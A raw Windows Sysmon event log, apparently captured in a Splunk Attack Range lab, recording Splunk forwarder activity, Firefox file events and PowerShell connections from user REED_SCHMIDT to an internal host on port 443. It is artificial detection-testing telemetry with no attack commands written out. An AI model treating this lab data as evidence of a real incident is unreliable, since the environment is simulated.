Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.421{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8265-613A-AD96-03000000C801}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.406{B81B27B7-8265-613A-AD96-03000000C801}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:42.635{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F40C7B2DBD864E07039885C171EF2535,SHA256=7CC7C52CB54EC673ED5EA565AF6EA606C65D20B282F2E078842173D678648520,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:42.120{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8266-613A-AE96-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:42.120{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:42.120{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:42.120{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8266-613A-AE96-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:42.120{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:42.120{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:42.120{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8266-613A-AE96-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:42.105{B81B27B7-8266-613A-AE96-03000000C801}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:43.637{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A40DEF9DCB6CE765A3ED14CD46D391B6,SHA256=F27862C6533645F1C779850435BAD1E4DC479B8A8B0AD3A31C8E4AC78EAD7003,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:43.106{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECBD53B347C436AEA30F3BB66761BDF6,SHA256=D25D1458CEC4114D153F8A14963C3B471FF52AE73B6FBA7DB99DC3B535C6150B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:44.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B2984A8E1B8603DB6D7D703B2F7EC4,SHA256=AEADAB4679B0599B8E5C20BDBAD51281ADC1C6A495C95D98D61ECA88A83CB581,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:44.376{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\aborted-session-pingMD5=3985647C4B66C74671A80D2C92CD8086,SHA256=736A86BEA45EAA02E916C0540705C8B897143210C182AA9E4365F8744DE26735,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:45.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=70F0F753A0AA8C5B0C1B0F99A2CBF293,SHA256=E90A5F21082C425DCE2178FDFD3E7C8657BE6A039CA42C4F2427A35674288CC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:45.672{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06168A3FCECE7C3713BC3E95B344A421,SHA256=5552F994FF87CB9555CDF53C53E72319929E847B4B6DCCAFD666012A29EED634,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:46.754{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6617B69DCF27A07987527E7770F0C14E,SHA256=19D2706B02F4F8C76C201965DDC1C3338534E512B09DA8E4105230FFAA8D39BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.233{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62029-false10.0.1.12-8000- 354300x800000000000000035127461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:11.034{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62028-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:46.192{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=5B6A948F6D74ACB7CC2D087218A8D3E8,SHA256=934906AF5DAFCA77485E4B2FE27A356A9C7C27C9F78919910E36BFA2050295D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:46.192{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=73287E07DE556D0CEB4C73B0AEF37D8A,SHA256=43E83B354D95EBCBFA939D7A804BA64EDD13842A85AEA9D80BB197ED861C6A26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:46.192{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=A79E91C876BB9CA6B929969293D38F49,SHA256=1F429EA1EDF72EB665BE296D415C2C57545776B4323B52A43A4CBD80B32FCB27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:46.192{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=3CCB8D8664D169333BA9DE3E2AC05361,SHA256=F33148797936C61267FFFFEE62D6D8D23361CB0F7C5577301E8D80AA80C3FA17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:46.192{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=7C11B87541EFF0A8624F974A8C646CDA,SHA256=D562293B37BF990FAF989F9F5884C18C70F51AD2DE11D59D1B2E515D9988C921,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:46.192{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=2D2A671ED7AFFBF4D807BBE1C519B822,SHA256=6A4D0CB3C8203EA4D84A933771ED7798418C90B920F5F4D5D9A2CC438DB34C31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:47.771{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ACA9EB91C8F4EF7EE21498B9AFE7720,SHA256=B832C29006215D9E7C2A71959FAFD8E825FA29A6516670235121F079C53C50F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:48.836{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA614D8EE54C91E4A59FA0EC7658BF2B,SHA256=86F8DD2FD4700C729F04F920F0C913D0FCD9EE9B1B5C50B804AA7DCFC1D1F647,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:49.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A01581002F885393587C28D0A099E7D9,SHA256=6FE03614CFF0DEFE010AA0AF7EB475F5664CFA54F1EF99AE7B1628FF1D43B93D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:50.950{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A11E6853C28017AB2A285F1F45080FC3,SHA256=DB5571B96C8E00201E89C5DE23332424F5E727E780717DF4C601C1E38942357D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:51.966{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=061C5E01A72C095BFEA162EB8999E8A0,SHA256=250F04B970B6CEA6EB9A191DC3EE94193C3E39FBF292BE01B11BAD24AE123C7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:51.886{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D6546D095EE96454297FDA1936357AD3,SHA256=CDF10BCB3FCE936F17E3BCA8470317E40A760680F8A701F7BB8DCE855F009DEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:16.429{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62030-false10.0.1.12-8000- 23542300x800000000000000035127471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:52.985{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EF803782E481537B0A04455390AE718,SHA256=C72B3D4E9A8C2CCFD94D1809359B3ADBDBB736AC89C3901203F8F7F3FAC0938E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:17.046{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62031-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:54.000{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAD604B040ED2378C2D01F182A77C6C6,SHA256=2C8080C081DEC1DB8A6FB183FCD2924A3656817696696601D4AAF372BD73B6D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:55.030{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50085136BB7378DE4DFD0986E864FF34,SHA256=FD79E98DE8D6C0A09AAA82096EF77D9C05658DF3457F5335962581E736D2EFF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:56.045{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00C84E21AA35E5D8B5AA6D0D381C9BC6,SHA256=4D4E7E7E6B280280C24BF288029A9BCCF82A46DCAE788157C32BE422B0C9F4CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:57.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7A63DFEB61E4951C4317CC51D5114403,SHA256=D1A3F2F536BD3CC2DC47FDA7E583E5FCBF10D7A2AD1FB0B6E84CDEC7DB334CBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:57.062{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AEF4B133DFB8C3CDED3E6C32C5302D8,SHA256=8189A123A947B725026A663884558925F80C09DEBD30B21901603C57F6C0804B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:58.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36A92FC93FFD4DACBBD6473825EFB52E,SHA256=43C6201FF8679E53B665E8EC2EFC15D9C0F4EF419AA8FA1309ED70A174F649ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:54:22.323{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62033-false10.0.1.12-8000- 354300x800000000000000035127478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 